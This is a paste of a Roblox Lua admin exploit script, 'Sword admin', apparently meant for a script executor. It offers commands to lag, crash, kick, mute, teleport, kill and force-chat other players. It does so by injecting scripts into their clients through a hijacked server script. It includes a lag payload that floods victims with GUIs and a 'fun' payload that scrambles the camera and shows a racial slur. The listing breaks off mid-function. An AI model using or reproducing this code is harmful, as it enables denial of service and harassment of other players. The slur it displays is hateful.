SHOW:
|
|
- or go back to the newest paste.
1 | wait() | |
2 | LocalPlayer = game:service("Players").LocalPlayer | |
3 | script.Parent = __Sword__ | |
4 | Tabs = {} | |
5 | Cmds = {} | |
6 | key = "/" | |
7 | chatgui = false | |
8 | probemode = false | |
9 | Safe = "TheScriptGod" | |
10 | connection = nil | |
11 | Updates = " No New Current Updates, Sorry :c" | |
12 | ||
13 | --not sure if it will work. | |
14 | --BRanks = -1 = Kick, -2 = Lag, -3 = Mute, -4 = Rejoin | |
15 | ||
16 | ||
17 | tabmodel = Instance.new("Model", Workspace) | |
18 | tabmodel.Name = "Sword tabs" | |
19 | SourceName = "DSource" | |
20 | Banlist = {"StudioGod","Studio8x8"} | |
21 | ||
22 | ||
23 | function Crash(name) | |
24 | name = tostring(name or "nil") | |
25 | local t = Instance.new("StringValue") | |
26 | t.Name = "DISC: "..name | |
27 | t.Parent = game.Lighting | |
28 | game:GetService("Debris"):AddItem(t,1) | |
29 | end | |
30 | ||
31 | LagSource = [==[ | |
32 | wait(0) | |
33 | script.Parent = nil | |
34 | plr = game:GetService("Players").LocalPlayer | |
35 | local plrgui = plr:findFirstChild("PlayerGui") | |
36 | if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end | |
37 | while plr.Parent == game:GetService("Players") do | |
38 | wait() | |
39 | for i = 1, 1000 do | |
40 | local sc = Instance.new("ScreenGui",plrgui) | |
41 | local fr = Instance.new("TextLabel",sc) | |
42 | fr.Text = "LAGGING" | |
43 | fr.Size = UDim2.new(1, 0, 1, 0) | |
44 | fr.FontSize = "Size48" | |
45 | end | |
46 | end | |
47 | ]==] | |
48 | ||
49 | FunScript = [[ | |
50 | LP = game:service'Players'.LocalPlayer | |
51 | Shapes = {"Ball", "Block"} | |
52 | wait() | |
53 | script.Parent = nil | |
54 | Delay(0, function() | |
55 | while wait() do | |
56 | workspace.CurrentCamera.CameraType = "Scriptable" | |
57 | workspace.CurrentCamera.FieldOfView = workspace.CurrentCamera.FieldOfView + math.random(-5,5) | |
58 | workspace.CurrentCamera:SetRoll(workspace.CurrentCamera:GetRoll()+0.075) | |
59 | workspace.CurrentCamera.CoordinateFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-2,2),math.random(-2,2),math.random(-2,2)) | |
60 | local Part = Instance.new("Part", workspace.CurrentCamera) | |
61 | Part.Shape = Shapes[math.random(1, 2)] | |
62 | Part.Anchored = true | |
63 | Part.BrickColor = BrickColor.new(math.random(),math.random(),math.random()) | |
64 | Part.Size = Vector3.new(math.random(5,10),math.random(-25,25),math.random(5,10)) | |
65 | Part.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-250,250),math.random(-100,100),math.random(-250,250)) * CFrame.Angles(math.random(),math.random(),math.random()) | |
66 | local Smoke = Instance.new("Smoke", Part) | |
67 | Smoke.Color = Color3.new(math.random(), math.random(), math.random()) | |
68 | Smoke.Opacity = 0.7 | |
69 | local Sparkles = Instance.new("Sparkles", Part) | |
70 | Sparkles.SparkleColor = Color3.new(math.random(), math.random(), math.random()) | |
71 | local Fire = Instance.new("Fire", Part) | |
72 | Fire.Color = Color3.new(math.random(), math.random(), math.random()) | |
73 | Fire.SecondaryColor = Color3.new(math.random(), math.random(), math.random()) | |
74 | local Ex = Instance.new("Explosion", workspace.CurrentCamera) | |
75 | Ex.Position = Vector3.new(math.random(-250,250),math.random(10,100),math.random(-250,250)) | |
76 | Ex.BlastPressure = 15 | |
77 | Ex.BlastRadius = 12.5 | |
78 | if not workspace.CurrentCamera:findFirstChild("Hint") then | |
79 | local mes = Instance.new("Hint", workspace.CurrentCamera) | |
80 | mes.Text = "OMG STOP FUCKING WITH MY SHIT YOU STUPID NIGGA" | |
81 | end | |
82 | end | |
83 | end) | |
84 | ]] | |
85 | Playerlist = {} | |
86 | ||
87 | function NilCrash(Name) | |
88 | local Crasher = Instance.new("StringValue") | |
89 | Crasher.Name = "Client" | |
90 | Crasher.Value = string.lower(tostring(Name)) | |
91 | Crasher.Parent = game:GetService("Lighting") | |
92 | wait(1) | |
93 | if Crasher and Crasher.Parent then | |
94 | ypcall(function() | |
95 | Crasher:Destroy() | |
96 | end) | |
97 | end | |
98 | end | |
99 | ||
100 | ||
101 | ||
102 | ||
103 | ||
104 | coroutine.resume(coroutine.create(function() | |
105 | while wait(3) do | |
106 | if game:GetService("Players").Name ~= "Players" then | |
107 | game:GetService("Players").Name = "Players" | |
108 | end | |
109 | end | |
110 | end)) | |
111 | ||
112 | ||
113 | ||
114 | ||
115 | function Dismiss() | |
116 | for i = 1, 10 do | |
117 | for i = 1, #Tabs do | |
118 | table.remove(Tabs, i) | |
119 | if tabmodel then | |
120 | tabmodel:ClearAllChildren() | |
121 | end end end | |
122 | end | |
123 | ||
124 | function AddCmd(Name,Say,Desc,Func) | |
125 | table.insert(Cmds,{["Name"] = Name,["Say"] = Say,["Desc"] = Desc,["Func"] = Func}) | |
126 | end | |
127 | ||
128 | ||
129 | AddCmd("Banlist","bl","Show the banned players", | |
130 | function() | |
131 | Dismiss() | |
132 | for i, v in pairs(Banlist) do | |
133 | Output(v) | |
134 | end | |
135 | end | |
136 | ) | |
137 | ||
138 | AddCmd("Fun","fun","Make some fun for a player", | |
139 | function(plrs) | |
140 | for _, plr in pairs(plrs) do | |
141 | if plr and plr.Backpack then | |
142 | NewLS(FunScript, plr.Backpack) | |
143 | end | |
144 | end | |
145 | end | |
146 | ) | |
147 | ||
148 | ||
149 | ||
150 | AddCmd("Lag player","lag","Lag a player", | |
151 | function(plrs) | |
152 | for _, plr in pairs(plrs) do | |
153 | if plr and plr.Backpack then | |
154 | NewLS(LagSource, plr.Backpack) | |
155 | end | |
156 | end | |
157 | end | |
158 | ) | |
159 | ||
160 | ||
161 | AddCmd("Nuke","nuke","Nuke a player", | |
162 | function(plrs) | |
163 | for _, plr in pairs(plrs) do | |
164 | if plr and plr.Character then | |
165 | a = Instance.new("Explosion", plr.Character) | |
166 | a.Position = plr.Character.Torso | |
167 | end | |
168 | end | |
169 | end | |
170 | ) | |
171 | ||
172 | AddCmd("Fire","fire","Fire a player", | |
173 | function(plrs) | |
174 | for _, plr in pairs(plrs) do | |
175 | if plr and plr.Character and plr.Character.Torso then | |
176 | Instance.new("Fire", plr.Character.Torso) | |
177 | end | |
178 | end | |
179 | end | |
180 | ) | |
181 | ||
182 | AddCmd('Idiots','nilp','Find out on your own', | |
183 | function(plrs,msg) | |
184 | for _,v in pairs(Playerlist) do | |
185 | if not game.Players[v.Name] then | |
186 | Output('(NIL) '..v.Name, function() Output('NilCrash this person?', function() NilCrash(v.Name) end) end) | |
187 | else | |
188 | Output(v.Name,__) | |
189 | end | |
190 | end | |
191 | end | |
192 | ) | |
193 | ||
194 | AddCmd("Un-fire","unfire","Remove fire from player", | |
195 | function(plrs) | |
196 | for _, plr in pairs(plrs) do | |
197 | if plr and plr.Character and plr.Character.Torso then | |
198 | pcall(function() | |
199 | for j, k in pairs(plr.Character.Torso:GetChildren()) do | |
200 | if k:IsA("Fire") then | |
201 | k:Destroy() | |
202 | end | |
203 | end | |
204 | end) | |
205 | end | |
206 | end | |
207 | end | |
208 | ) | |
209 | ||
210 | found = false | |
211 | ||
212 | coroutine.wrap(function() | |
213 | while found == false do | |
214 | if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end | |
215 | for _,scriptinworkspace in pairs(workspace:children()) do | |
216 | if scriptinworkspace then | |
217 | if scriptinworkspace:IsA("Script") then | |
218 | if scriptinworkspace:FindFirstChild(SourceName) then | |
219 | newScript = scriptinworkspace:Clone() | |
220 | wait(0.2) | |
221 | newScript.Name = "NewScript" | |
222 | newScript.Disabled = true | |
223 | newScript:FindFirstChild(SourceName).Value = "" | |
224 | Output("Source found", __) | |
225 | found = true | |
226 | break | |
227 | end | |
228 | end | |
229 | end | |
230 | end | |
231 | wait() | |
232 | end | |
233 | end)() | |
234 | ||
235 | AddCmd("Unpunish player","unpunish","Restore the player's character", | |
236 | function(plrs) | |
237 | for _, plr in pairs(plrs) do | |
238 | if plr then | |
239 | NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace) | |
240 | end | |
241 | end | |
242 | end | |
243 | ) | |
244 | ||
245 | function NewS(sourcevalue, parent) | |
246 | if game.PlaceId == 21053279 or game.PlaceId == 21053219 then | |
247 | NS(sourcevalue, parent) | |
248 | else | |
249 | if newScript then | |
250 | local scr = newScript:Clone() | |
251 | if scr:FindFirstChild(SourceName) then | |
252 | if scr:FindFirstChild(SourceName) then | |
253 | scr:FindFirstChild(SourceName).Value = sourcevalue | |
254 | scr.Parent = parent | |
255 | wait(0.5) | |
256 | scr.Disabled = false | |
257 | return scr | |
258 | end | |
259 | end | |
260 | end | |
261 | end | |
262 | end | |
263 | ||
264 | sorcery = script:Clone() | |
265 | ||
266 | Services = { | |
267 | game:GetService("Workspace"), | |
268 | game:GetService("Players"), | |
269 | game:GetService("Lighting"), | |
270 | game:GetService("StarterPack"), | |
271 | game:GetService("StarterGui"), | |
272 | game:GetService("Teams"), | |
273 | game:GetService("SoundService"), | |
274 | game:GetService("Debris"), | |
275 | game:GetService("InsertService"), | |
276 | game:GetService("RunService"), | |
277 | game:GetService("Chat"), | |
278 | game:GetService("TeleportService"), | |
279 | game:GetService("Geometry"), | |
280 | game:GetService("MarketplaceService"), | |
281 | game:GetService("BadgeService"), | |
282 | game:GetService("NetworkClient"), | |
283 | game:GetService("FriendService"), | |
284 | } | |
285 | ||
286 | function Explore(Item) | |
287 | Dismiss() | |
288 | if(Item==nil)then | |
289 | for _,v in pairs(Services)do | |
290 | Output(v.Name,function() Explore(v) end) | |
291 | end; | |
292 | else | |
293 | f={ | |
294 | ['View children']=function() | |
295 | Dismiss() | |
296 | for _,v in pairs(Item:children())do | |
297 | Output(v.Name,function() | |
298 | Explore(v) | |
299 | wait() | |
300 | end); | |
301 | end; | |
302 | end; | |
303 | ['View parent']=function() | |
304 | Explore(Item.Parent) | |
305 | end; | |
306 | ['Destroy']=function() | |
307 | Item:Destroy(); | |
308 | Explore(Item.Parent); | |
309 | end; | |
310 | ['Clear']=function() | |
311 | Item:ClearAllChildren() | |
312 | end; | |
313 | ['Clone']=function() | |
314 | pcall(function() | |
315 | cloneableObj = Item:clone() | |
316 | end) | |
317 | end; | |
318 | ['Remove']=function() | |
319 | Item:remove() | |
320 | end; | |
321 | ['Paste']=function() | |
322 | if cloneableObj then | |
323 | cloneableObj.Parent = Item | |
324 | end | |
325 | end; | |
326 | ['Ki'..'ck Item']=function() | |
327 | NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item) | |
328 | end; | |
329 | }; | |
330 | for i,v in pairs(f)do | |
331 | Output(tostring(i),v); | |
332 | end; | |
333 | Output('Item Name: \''..tostring(Item.Name)..'\'',nil); | |
334 | Output('Class: \''..tostring(Item.ClassName)..'\'',nil); | |
335 | if cloneableObj then | |
336 | Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil); | |
337 | end | |
338 | end; | |
339 | end; | |
340 | ||
341 | AddCmd("Explore","explore","Explore the game", | |
342 | function() | |
343 | Explore() | |
344 | end | |
345 | ) | |
346 | ||
347 | function NewLS(sourcevalue, parent) | |
348 | if game.PlaceId == 21053279 or game.PlaceId == 21053219 then | |
349 | NLS(sourcevalue, parent) | |
350 | else | |
351 | local NS = sorcery:Clone() | |
352 | NS.Name = "NewLocal" | |
353 | local Source = NS:findFirstChild(SourceName) | |
354 | if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName) | |
355 | Source.Value = sourcevalue | |
356 | NS.Parent = parent | |
357 | NS.Disabled = false | |
358 | return NS | |
359 | end | |
360 | end | |
361 | ||
362 | Clothes = {} | |
363 | ||
364 | for _,Item in pairs(LocalPlayer.Character:GetChildren()) do | |
365 | if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then | |
366 | table.insert(Clothes,Item:Clone()) | |
367 | end | |
368 | end | |
369 | for i,v in pairs(LocalPlayer.Character:GetChildren()) do | |
370 | if v:IsA("BodyColors") then | |
371 | body = v | |
372 | torsocolor = body.TorsoColor | |
373 | leftlegcolor = body.LeftLegColor | |
374 | rightlegcolor = body.RightLegColor | |
375 | leftarmcolor = body.LeftArmColor | |
376 | rightarmcolor = body.RightArmColor | |
377 | headcolor = body.HeadColor | |
378 | end | |
379 | end | |
380 | ||
381 | mouse = LocalPlayer:GetMouse() | |
382 | ||
383 | mouse.KeyDown:connect(function(key) | |
384 | if key == "z" then | |
385 | game:service'StarterGui':SetCoreGuiEnabled(4, true) | |
386 | end | |
387 | end) | |
388 | ||
389 | AddCmd("Toogle ChatGUI","chat","Toogle ChatGUI on/off", | |
390 | function(plrs, msg) | |
391 | if msg == "off" then | |
392 | chatgui = false | |
393 | elseif msg == "on" then | |
394 | chatgui = true | |
395 | end | |
396 | end | |
397 | ) | |
398 | ||
399 | AddCmd("Set WalkSpeed","ws","Set the walkspeed of player", | |
400 | function(plrs, msg) | |
401 | local keypos = msg:find(key) | |
402 | local targPlayers = msg:sub(1,keypos-1) | |
403 | local plrs = getPlayers(targPlayers) | |
404 | local speed = msg:sub(tonumber(keypos+1)) | |
405 | for _,v in pairs(plrs) do | |
406 | if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then | |
407 | v.Character:findFirstChild("Humanoid").WalkSpeed = speed | |
408 | end | |
409 | end | |
410 | end | |
411 | ) | |
412 | ||
413 | ||
414 | ||
415 | AddCmd("Teleport","tp","Teleport a player to a place", | |
416 | function(plrs, msg) | |
417 | local keypos = msg:find(key) | |
418 | local targPlayers = msg:sub(1,keypos-1) | |
419 | local plrs = getPlayers(targPlayers) | |
420 | local id = msg:sub(tonumber(keypos+1)) | |
421 | for _,v in pairs(plrs) do | |
422 | if v and v.Backpack then | |
423 | NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack) | |
424 | end | |
425 | end | |
426 | end | |
427 | ) | |
428 | ||
429 | ||
430 | AddCmd("Chat","cht","Forces a player to chat ;)", | |
431 | function(plrs, msg) | |
432 | local keypos = msg:find(key) | |
433 | local targPlayers = msg:sub(1,keypos-1) | |
434 | local plrs = getPlayers(targPlayers) | |
435 | local id = msg:sub(tonumber(keypos+1)) | |
436 | for _,v in pairs(plrs) do | |
437 | if v and v.Backpack then | |
438 | NewLS([==[game:service'Players':Chat(']==]..id..[==[')]==], v.Backpack) | |
439 | end | |
440 | end | |
441 | end | |
442 | ) | |
443 | ||
444 | Bad_Char = "" | |
445 | ||
446 | function chatgui(msg) | |
447 | if not chatgui then return end | |
448 | if probemode == false then | |
449 | if LocalPlayer.Character:findFirstChild("Head") then | |
450 | mainPart = LocalPlayer.Character:findFirstChild("Head") | |
451 | end | |
452 | end | |
453 | if probemode == true then | |
454 | if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then | |
455 | mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") | |
456 | end | |
457 | end | |
458 | local bg = Instance.new("BillboardGui", mainPart) | |
459 | bg.Adornee = mainPart | |
460 | bg.Name = "CHATGUIBG" | |
461 | bg.Size = UDim2.new(4, 0, 2.5, 0) | |
462 | bg.StudsOffset = Vector3.new(-4, 2, 0) | |
463 | local bg2 = Instance.new("BillboardGui", mainPart) | |
464 | bg2.Adornee = mainPart | |
465 | bg2.Name = "CHATGUIBG2" | |
466 | bg2.Size = UDim2.new(4, 0, 2.5, 0) | |
467 | bg2.StudsOffset = Vector3.new(-4, 4.5, 0) | |
468 | local text = Instance.new("TextLabel", bg) | |
469 | text.Size = UDim2.new(3, 0, 0.5, 0) | |
470 | text.FontSize = "Size18" | |
471 | text.TextScaled = true | |
472 | text.TextTransparency = 0 | |
473 | text.BackgroundTransparency = 1 | |
474 | text.TextTransparency = 0 | |
475 | text.TextStrokeTransparency = 0 | |
476 | text.Font = "Arial" | |
477 | text.TextColor = BrickColor.new("Institutional white") | |
478 | text.Text = " " | |
479 | Message = msg:sub(1) | |
480 | if #Message >50 then return end | |
481 | for i = 0, #Message, 1 do | |
482 | wait(0.01) | |
483 | text.Text = string.gsub("["..LocalPlayer.Name.."]: "..Message:sub(0, i),'fuck','fuck') | |
484 | end | |
485 | wait() | |
486 | coroutine.resume(coroutine.create(function() | |
487 | for i = 0, 5, 0.05 do | |
488 | if bg ~= nil then | |
489 | if bg2 ~= nil then | |
490 | wait() | |
491 | bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0) | |
492 | end | |
493 | bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0) | |
494 | end | |
495 | end | |
496 | end)) | |
497 | for i=text.TextTransparency,1,0.02 do | |
498 | wait() | |
499 | text.TextTransparency = i | |
500 | text.TextStrokeTransparency = i | |
501 | end | |
502 | if bg == nil then return end | |
503 | bg:Destroy() | |
504 | if bg2 == nil then return end | |
505 | bg2:Destroy() | |
506 | end | |
507 | ||
508 | LocalPlayer.Chatted:connect(chatgui) | |
509 | ||
510 | AddCmd("Message","m","Make a message over the screen", | |
511 | function(plrs, msg) | |
512 | Message = msg | |
513 | NewS([[ | |
514 | a = Instance.new("Message", workspace) | |
515 | a.Text = ]].."[ "..LocalPlayer.Name.." ]: "..Message, workspace) | |
516 | end | |
517 | ) | |
518 | ||
519 | AddCmd("Hint","h","Make a message at top of the screen", | |
520 | function(plrs, msg) | |
521 | Hint = msg | |
522 | NewS([[ | |
523 | a = Instance.new("Hint", workspace) | |
524 | a.Text = ]]..Hint, workspace) | |
525 | end | |
526 | ) | |
527 | ||
528 | AddCmd("Commands","cmds","Show the list of commands", | |
529 | function() | |
530 | Dismiss() | |
531 | for i, v in pairs(Cmds) do | |
532 | Output(v["Name"], | |
533 | function() | |
534 | Output("Description: "..v["Desc"], __) | |
535 | Output("Usage: "..v["Say"], __) | |
536 | Output("Name: "..v["Name"], __) | |
537 | end) | |
538 | end | |
539 | end | |
540 | ) | |
541 | ||
542 | AddCmd("Rejoin player","rej","Rejoin the player", | |
543 | function(plrs) | |
544 | for _, plr in pairs(plrs) do | |
545 | if plr and plr.Backpack then | |
546 | NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack) | |
547 | end | |
548 | end | |
549 | end | |
550 | ) | |
551 | ||
552 | AddCmd("Create base","base","Create the base", | |
553 | function() | |
554 | a = Instance.new("Part") | |
555 | a.Parent = Workspace | |
556 | a.Name = "Base" | |
557 | a.Position = Vector3.new(0, 0.6, 0) | |
558 | a.Size = Vector3.new(1002, 0, 1002) | |
559 | a.Material = "Grass" | |
560 | a.Anchored = true | |
561 | a.BrickColor = BrickColor.new("Dark green") | |
562 | end | |
563 | ) | |
564 | ||
565 | AddCmd("Ping","ping","Ping something", | |
566 | function(plrs, msg) | |
567 | if msg == "" then | |
568 | Output("pong", __) | |
569 | else | |
570 | Output(msg, __) | |
571 | end | |
572 | end | |
573 | ) | |
574 | ||
575 | AddCmd("Dismiss","dis","Dismiss tabs", | |
576 | function() | |
577 | Dismiss() | |
578 | end | |
579 | ) | |
580 | ||
581 | AddCmd("Probe mode", "probe", "Be a ball and fly around", | |
582 | function() | |
583 | probemode = true | |
584 | Dismiss() | |
585 | if LocalPlayer.Character then LocalPlayer.Character = nil end | |
586 | if workspace.CurrentCamera == nil then return end | |
587 | local camera = workspace.CurrentCamera | |
588 | local probe = Instance.new("Part", workspace) | |
589 | M = Instance.new("SpecialMesh", probe) | |
590 | M.MeshId = "http://www.roblox.com/asset/?id=121925241" | |
591 | M.TextureId = "http://www.roblox.com/asset/?id=121924580" | |
592 | M.Scale = Vector3.new(2, 2, 2) | |
593 | probe.TopSurface = 0 | |
594 | probe.Anchored = true | |
595 | probe.BottomSurface = 0 | |
596 | probe.Name = LocalPlayer.Name.."'s probe" | |
597 | local rotation = 0 | |
598 | local bbg = Instance.new("BillboardGui", probe) | |
599 | bbg.Size = UDim2.new(3, 0, 3 ,0) | |
600 | bbg.ExtentsOffset = Vector3.new(0, 2, 0) | |
601 | local txt = Instance.new("TextLabel", bbg) | |
602 | txt.FontSize = "Size24" | |
603 | txt.Font = "SourceSansBold" | |
604 | txt.Text = LocalPlayer.Name | |
605 | txt.BackgroundTransparency = 1 | |
606 | txt.TextColor = BrickColor.new("Institutional white") | |
607 | txt.TextStrokeTransparency = 0 | |
608 | txt.Size = UDim2.new(1,0,1,0) | |
609 | local pl = Instance.new("PointLight", probe) | |
610 | pl.Shadows = true | |
611 | pl.Range = 20 | |
612 | coroutine.wrap(function() | |
613 | while pl ~= nil do | |
614 | pl.Color = Color3.new(math.random(), math.random(), math.random()) | |
615 | wait(0.8) | |
616 | end | |
617 | end)() | |
618 | coroutine.wrap(function() | |
619 | while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do | |
620 | probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0) | |
621 | rotation = rotation + 0.1 | |
622 | end | |
623 | if camera then | |
624 | camera:Destroy() | |
625 | end | |
626 | probe:Destroy() | |
627 | end)() | |
628 | end | |
629 | ) | |
630 | ||
631 | AddCmd("Make your character","char","Creates your character", | |
632 | function() | |
633 | if workspace.CurrentCamera == nil then return end | |
634 | local camera = workspace.CurrentCamera | |
635 | local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1] | |
636 | local human = new_char.Humanoid | |
637 | human.Parent = nil | |
638 | new_char.Name = LocalPlayer.Name | |
639 | wait() | |
640 | human.Parent = new_char | |
641 | camera.CameraSubject = human | |
642 | camera.CameraType = "Custom" | |
643 | new_char.Parent = workspace | |
644 | local pl = Instance.new("PointLight", new_char.Head) | |
645 | pl.Range = 24 | |
646 | pl.Shadows = true | |
647 | LocalPlayer.Character = new_char | |
648 | new_char:MakeJoints() | |
649 | new_char.Torso.BrickColor = torsocolor | |
650 | new_char["Left Leg"].BrickColor = leftlegcolor | |
651 | new_char["Right Leg"].BrickColor = rightlegcolor | |
652 | new_char["Left Arm"].BrickColor = leftarmcolor | |
653 | new_char["Right Arm"].BrickColor = rightarmcolor | |
654 | new_char.Head.BrickColor = headcolor | |
655 | for i,v in pairs(Clothes) do | |
656 | v:Clone().Parent = new_char | |
657 | end | |
658 | probemode = false | |
659 | end | |
660 | ) | |
661 | ||
662 | AddCmd("Stop the commands","cremove","Remove the commands", | |
663 | function() | |
664 | Output("Are you sure that you wan't to remove the Sword admin?", | |
665 | function() | |
666 | Output("Are you 100% sure that you want this???", | |
667 | function() | |
668 | for i,v in pairs(getfenv(1)) do | |
669 | getfenv(1)[i] = nil | |
670 | end | |
671 | script.Disabled = true | |
672 | LocalPlayer = NO_PLAYER | |
673 | script:findFirstChild(SourceName).Value = " " | |
674 | script.Disabled = true | |
675 | tabmodel:ClearAllChildren() | |
676 | tabmodel:Destroy() | |
677 | connection:disconnect() | |
678 | Tabs = {} | |
679 | Cmds = {} | |
680 | Banlist = {} | |
681 | fukhed.all = true | |
682 | coroutine.resume(coroutine.create(function() | |
683 | while wait(0.1) do | |
684 | Dismiss() | |
685 | end | |
686 | end)) | |
687 | end) | |
688 | end) | |
689 | end | |
690 | ) | |
691 | ||
692 | AddCmd("ForceField","ff","Give forcefield to player", | |
693 | function(plrs) | |
694 | for _, plr in pairs(plrs) do | |
695 | if plr and plr.Character then | |
696 | Instance.new("ForceField", plr.Character) | |
697 | end | |
698 | end | |
699 | end | |
700 | ) | |
701 | ||
702 | AddCmd("Sparkles","sparkles","Give sparkles to player", | |
703 | function(plrs) | |
704 | for _, plr in pairs(plrs) do | |
705 | if plr and plr.Character and plr.Character.Torso then | |
706 | Instance.new("Sparkles", plr.Character.Torso) | |
707 | end | |
708 | end | |
709 | end | |
710 | ) | |
711 | ||
712 | AddCmd("Un-Sparkles","unsparkles","Remove sparkles from player", | |
713 | function(plrs) | |
714 | for _, plr in pairs(plrs) do | |
715 | if plr and plr.Character and plr.Character.Torso then | |
716 | pcall(function() | |
717 | for j, k in pairs(plr.Character.Torso:GetChildren()) do | |
718 | if k:IsA("Sparkles") then | |
719 | k:Destroy() | |
720 | end | |
721 | end | |
722 | end) | |
723 | end | |
724 | end | |
725 | end | |
726 | ) | |
727 | ||
728 | AddCmd("Crash player","crash","Crash the player", | |
729 | function(plrs) | |
730 | for _, plr in pairs(plrs) do | |
731 | if plr and plr.Backpack then | |
732 | NewLS([==[ | |
733 | game:GetService("RunService").RenderStepped(function() | |
734 | Delay(0, function() return end) | |
735 | end)]==], plr.Backpack) | |
736 | end | |
737 | end | |
738 | end | |
739 | ) | |
740 | ||
741 | AddCmd("Respawn player","respawn","Respawn the player", | |
742 | function(plrs) | |
743 | for _, plr in pairs(plrs) do | |
744 | NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace) | |
745 | end | |
746 | end | |
747 | ) | |
748 | ||
749 | AddCmd("Mute player","mute","Block the player chat", | |
750 | function(plrs) | |
751 | for _, plr in pairs(plrs) do | |
752 | if plr and plr.Backpack then | |
753 | NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack) | |
754 | end | |
755 | end | |
756 | end | |
757 | ) | |
758 | ||
759 | AddCmd("Unmute player","unmute","Unblock the player chat", | |
760 | function(plrs) | |
761 | for _, plr in pairs(plrs) do | |
762 | if plr and plr.Backpack then | |
763 | NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack) | |
764 | end | |
765 | end | |
766 | end | |
767 | ) | |
768 | ||
769 | AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player", | |
770 | function(plrs) | |
771 | for _, plr in pairs(plrs) do | |
772 | if plr and plr.Character then | |
773 | pcall(function() | |
774 | for _,v in pairs(plr.Character:GetChildren()) do | |
775 | if v:IsA("ForceField") then | |
776 | v:Destroy() | |
777 | end | |
778 | end | |
779 | end) | |
780 | end | |
781 | end | |
782 | end | |
783 | ) | |
784 | ||
785 | AddCmd("Gear","gear","Give gear to player", | |
786 | function(plrs, msg) | |
787 | local keypos = msg:find(key) | |
788 | local targPlayers = msg:sub(1,keypos-1) | |
789 | local plrs = getPlayers(targPlayers) | |
790 | local asset = msg:sub(tonumber(keypos+1)) | |
791 | for _,plr in pairs(plrs) do | |
792 | if plr and plr.Backpack then | |
793 | local obj = game:service("InsertService"):LoadAsset(asset) | |
794 | pcall(function() | |
795 | for a,g in pairs(obj:children())do | |
796 | if g:IsA("Tool") or g:IsA("HopperBin") then | |
797 | g.Parent = plr.Backpack | |
798 | end | |
799 | end | |
800 | end) | |
801 | end | |
802 | end | |
803 | end | |
804 | ) | |
805 | ||
806 | ||
807 | AddCmd("God player","god","Make the player immortal", | |
808 | function(plrs) | |
809 | for _, plr in pairs(plrs) do | |
810 | if plr and plr.Character and plr.Character.Humanoid then | |
811 | plr.Character.Humanoid.MaxHealth = math.huge | |
812 | end | |
813 | end | |
814 | end | |
815 | ) | |
816 | ||
817 | AddCmd("Ungod player","ungod","Make the player mortal", | |
818 | function(plrs) | |
819 | for _, plr in pairs(plrs) do | |
820 | if plr and plr.Character then | |
821 | plr.Character.Humanoid.MaxHealth = 100 | |
822 | end | |
823 | end | |
824 | end | |
825 | ) | |
826 | ||
827 | AddCmd("Kick player","kick","Kick a player", | |
828 | function(plrs) | |
829 | for _, plr in pairs(plrs) do | |
830 | if plr and plr.Backpack then | |
831 | NewLS("game:service'StarterGui':SerCoreGuiEnabled(3,false)", plr.Backpack) | |
832 | plr:Destroy() | |
833 | end | |
834 | end | |
835 | end | |
836 | ) | |
837 | ||
838 | AddCmd("Kill player","kill","Kill a player", | |
839 | function(plrs) | |
840 | for _, plr in pairs(plrs) do | |
841 | if plr and plr.Character then | |
842 | plr.Character:BreakJoints() | |
843 | end | |
844 | end | |
845 | end | |
846 | ) | |
847 | ||
848 | AddCmd("Punish player","punish","Remove character of a player", | |
849 | function(plrs) | |
850 | for _, plr in pairs(plrs) do | |
851 | if plr and plr.Character then | |
852 | plr.Character:Destroy() | |
853 | end | |
854 | end | |
855 | end | |
856 | ) | |
857 | ||
858 | AddCmd("Admin a player","admin","Give admin to a player", | |
859 | function(plrs) | |
860 | for _, plr in pairs(plrs) do | |
861 | if plr and plr.Backpack then | |
862 | a = script:Clone() | |
863 | a.Parent = plr.Backpack | |
864 | Output("You gave admin to: "..plr.Name, __) | |
865 | end | |
866 | end | |
867 | end | |
868 | ) | |
869 | ||
870 | AddCmd("Fix cam","fcam","Fix anyone's cam", | |
871 | function(plrs, msg) | |
872 | for _, plr in pairs(plrs) do | |
873 | if plr and plr.Backpack then | |
874 | NewLS([[ | |
875 | game.Workspace.CurrentCamera:Destroy() | |
876 | cam = Instance.new("Camera", workspace) | |
877 | cam.Name = "CurrentCamera" | |
878 | cam.FieldOfView = 70 | |
879 | cam.CameraType = "Custom" | |
880 | cam.CameraSubject = game.Players.LocalPlayer.Character.Humanoid]], plr.Backpack) | |
881 | end | |
882 | end | |
883 | end | |
884 | ) | |
885 | ||
886 | AddCmd("AFK","afk","Ping yourself as afk", | |
887 | function() | |
888 | Dismiss() | |
889 | for i = 1,8 do | |
890 | wait() | |
891 | Output("AFK", __) | |
892 | end | |
893 | end | |
894 | ) | |
895 | ||
896 | AddCmd("Back","back","Ping yourself as back", | |
897 | function() | |
898 | Dismiss() | |
899 | for i = 1,8 do | |
900 | wait() | |
901 | Output("Back", __) | |
902 | end | |
903 | wait(3) | |
904 | Dismiss() | |
905 | end | |
906 | ) | |
907 | ||
908 | AddCmd("Ban a player","ban","Kicks a player when he enters", | |
909 | function(plrs, msg) | |
910 | for _,v in pairs(plrs) do | |
911 | if v then | |
912 | table.insert(Banlist,v.Name) | |
